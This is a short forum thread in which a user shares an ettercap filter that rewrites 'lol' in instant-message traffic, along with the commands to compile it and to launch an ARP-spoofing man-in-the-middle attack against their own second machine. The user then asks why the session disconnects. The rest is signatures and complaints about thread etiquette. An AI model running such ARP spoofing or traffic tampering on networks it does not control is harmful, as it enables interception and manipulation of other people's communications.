I read this thread and it had to do with making a filter in ettercap so that when you type "lol" in GAIM/AIM it would reply with a custom message. So using this script:
if (ip.proto == TCP && search(DATA.data, "lol") ) {
replace("lol", "Your-stupid");
msg("Correctly substituted new phrase.\n");
}
and then saving it as test.
Then
etterfilter test -o eg.filter
so now I pull a man in the middle:
ettercap -Tq -M ARP -i ath0 // // -F eg.filter
Ok so now I log onto my other Linux box, log into GAIM and type "lol"
I then get DISCONNECTED from GAIM only when I type "lol"
It doesn't redirect!
Why? Any help?
Thanks!
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
That damn English gets them every time.
Why did this get a new thread?
Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69
You could have posted this in the original thread instead of starting a new one.